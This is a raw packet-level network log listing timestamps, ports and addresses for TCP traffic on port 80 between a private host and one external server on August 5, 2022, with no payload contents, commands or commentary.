Aug 5, 2022 13:54:13.251112938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251153946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251178980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251198053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251236916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251260042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251277924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251305103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251319885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251343966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251398087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251452923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251493931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251508951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251542091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251580954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251597881 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251622915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251663923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251677990 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251705885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251749039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251758099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251789093 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251830101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251841068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251872063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251910925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.251924038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.251952887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252002954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252007008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252062082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252116919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252119064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252166986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252207994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252217054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252249002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252288103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252326012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252329111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252350092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252372980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252388000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252418995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252463102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252474070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252504110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252506971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252520084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252552032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.252564907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.252595901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.253602028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.281840086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.281893969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.281936884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.281980991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282021046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282063007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282063961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282084942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282088995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282093048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282105923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282125950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282147884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282165051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282192945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282236099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282278061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282331944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282351971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282361984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282371998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282375097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282385111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282417059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282459021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282489061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282500982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282536983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282546043 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282593012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282619953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282634020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282641888 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282646894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282675982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282716990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282749891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282756090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282772064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282800913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282843113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282882929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282927036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.282927990 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282938957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282954931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.282967091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283009052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283026934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283035994 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283051014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283067942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283091068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283132076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283143044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283184052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283201933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283230066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283248901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283253908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283293962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283334970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283343077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283365011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283374071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283410072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283493042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283518076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283550978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283612013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283615112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283637047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283663034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283715963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283737898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283756018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283797026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283839941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283840895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283858061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283879995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283879995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283921957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283945084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.283962965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.283993959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.284004927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.284071922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.284085035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.287034035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.287082911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.287123919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.287167072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.287173986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.287210941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.287220955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.287286997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313278913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313334942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313374996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313415051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313447952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313453913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313479900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313484907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313496113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313504934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313585997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313626051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313668013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313714981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313726902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313739061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313750029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.313781023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.313786983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.314296961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343126059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343166113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343200922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343235016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343262911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343292952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343322992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343414068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343445063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343476057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343508005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343539953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343570948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343602896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343632936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343666077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343694925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343727112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343758106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343794107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343825102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343857050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343887091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343916893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343933105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343950987 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343964100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343969107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343972921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343976021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343978882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343982935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343985081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.343986034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343990088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343992949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.343996048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344000101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344002008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344005108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344007969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344012022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344014883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344017982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344021082 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344022036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344048023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344057083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344074965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344091892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344125986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344146967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344156981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344182014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344189882 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344219923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344223976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344257116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344278097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344289064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344319105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344321966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344338894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344358921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344399929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344404936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344444990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344461918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344486952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344525099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344535112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344562054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344594002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344604969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344624996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344655991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344671965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344690084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344721079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344744921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344753027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344785929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344809055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344816923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344847918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344877005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344882965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344907999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344928026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.344939947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344970942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.344993114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345001936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345033884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345050097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345063925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345093966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345113993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345124006 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345155954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345174074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345189095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345220089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345242023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345251083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345268011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345282078 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345310926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345312119 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345335960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345343113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345359087 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345372915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345386982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345402956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345434904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345453978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345463991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345485926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345494986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345521927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345527887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345541954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345557928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345587969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345608950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345618010 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345643044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345649958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345676899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345681906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345695972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345711946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345742941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345760107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345774889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345804930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345829010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345835924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345839024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345851898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.345868111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345899105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345931053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345959902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.345989943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346003056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346014023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346019030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346021891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346039057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346051931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346076965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346084118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346098900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346115112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346146107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346172094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346177101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.346199989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.346206903 CEST	80	49778	51.195.166.178	192.168.2.4
